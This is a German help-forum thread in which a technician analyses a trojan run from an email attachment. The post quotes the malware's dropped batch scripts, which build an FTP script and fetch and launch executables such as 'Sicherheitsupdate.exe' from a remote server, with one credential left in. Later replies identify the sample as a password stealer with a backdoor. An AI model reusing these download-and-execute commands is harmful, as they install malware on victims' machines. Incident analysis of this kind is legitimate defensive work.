|
Selbstgebastelter Trojaner? Funktion unbekannt? Hallo Forum! :) Ich drehe hier am Rad... Bei einem Kunden hat ein Azubi irgendeinen Scheiss aus einer Email ausgeführt. adobeupdater.exe Durch paar Tricks mit der Sandbox habe ich herausgefunden: 1) es wird im temp verzeichniss eine bat angelegt mit foglendem inhalt: " o ftp.XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX weiswein007 bin lcd C:\Windows prompt mget Windows.exe mget hosts bye " Desweiteren werden dann per FTP anscheinend 4 Files geholt. eine Hosts datei, "port.exe" + "Sicherheitsupdate.exe" + "windows.exe" und im c:\windows verzeichniss gespeichert! Die Sicherheitsupdate.xe kreirt ebenfalls eine batt mit folgendem inhalt: "@echo off bjfeobefwbuoefwbuiofebuoebfwobuoefuhfuhefwu6895169516951695169051690516905160915609516060516051e uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651 hjbjkiioi896569569569569561512gjbjvbowvbowvbbjbuiewbuiecbuiebuiebfui698516951651695169516givGUIvgu uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651 uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651 uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651 uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651 > %0.ftp echo o XXXXXXXXXXXXXXXXXXXX >> %0.ftp echo XXXXXXXXXXXXX >> %0.ftp echo weiswein007 >> %0.ftp echo bin >> %0.ftp echo lcd %WINDIR% >> %0.ftp echo prompt >> %0.ftp echo mget Sicherheitsupdate.exe >> %0.ftp echo bye ftp -s:%0.ftp ping -n 60 localhost > nul & start %WINDIR%\Sicherheitsupdate.exe exit" Desweiteren werden einige andere files angelegt und FTP requests asgeführt welche ich nicht so schnell tracen konnte.... Hilft mir mal bitte. Was ist das hier für eine *******?!! Ich muss die Kiste nachher platt machen... das werden 5-6 Stunden arbeit sein...... im anhang findet ihr 1x die ursprungs EXE sowie die 3-4 files welche die bat datei herunterlädt... EDIT: ok die restliche files kann ich nicht im board anhngen da größer als 148kb... |
hallo, mal ne frage, bist du irre die datei hier anzuhängen? soll sich da jeder mit infizieren können? ich sehe sie mir an, versuch ob du noch löschen kannst und ich werd außerdem nem mod bescheid geben. |
ich würd dich außerdem bitten die ftp daten zu entfernen der trojaner ist schlecht gemacht, man kommt einfach an die daten. ich lösche erst mal das zeug was der auf dem ftp hat :p |
Den Beitrag kann ich noch editieren, jedoch keine Dateianhänge bearbeiten. Ich denke niemand wird so lebensmüde sein und nach dem Lesen des Beitrags den Anhang 4fun ausführen. Falls ja dann klar: Vmware, Sandbox, etc. |
FTP Daten gelöscht. Was kannst Du mir zu dem Trojaner sagen, welche Funktion erfüllt er genau? Komischerweise ist nichts angesprungen. Kein Kaspersky, keine Programmkontrolle usw. Welchen Zweck soll der Trojaner erfüllen?! |
kann ich dir noch net sagen. das denkst du vllt das das keiner anklickt... ich sehe es mir kmal an und meld mich |
Zitat:
Kontrollzentrum - ganz links unten Anhänge - Rechts den Anhang markieren und unten auf löschen Ich hab in diesen Unterforum keine Modrechte, sonst wäre der schon gelöscht |
Ok ist weg. Dennoch. Wie kann jemand ohne den Anhang den Inhalt analysieren? ;) Bitte schaut euch das an. Die Kiste ist ziemlich dicht gemacht, dennoch verstehe ich nicht was der Trojaner hier macht und bereite schon über 600GB an Backups vor .... |
ich hab die datei und wir hätten auch nen upload channel http://www.trojaner-board.de/54791-a...ner-board.html |
Zitat:
Cool :) Das einzige was malware antibytes findet ist: Infizierte Dateien: c:\Windows\System32\secushr.dat (Malware.Trace) -> No action taken. c:\Windows\SysWOW64\secushr.dat (Malware.Trace) -> No action taken. Sonst keinerlei Meldungen, nicht von kaspersky oder sonstwas... |
kannst mal in deine privaten nachichten schauen? mir ist da ein missgeschick passiert und ich bnötige die dateien aus deiner sandbox, falls sie noch bestehen. vom server habe ich sie ja gelöscht, aber beim download gabs probleme. sieht aber sehr nach backdoor aus. |
Und, gibt es schon Neuigkeiten? |
sorry war bescheftigt gestern. ja ist nen passwort stealer, mit backdoor funktionalität. wenn das also nen firmen pc ist, sollte man den vllt neu machen. würd ich persönlich jedenfalls so handhaben |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 13:40 Uhr. |
Copyright ©2000-2025, Trojaner-Board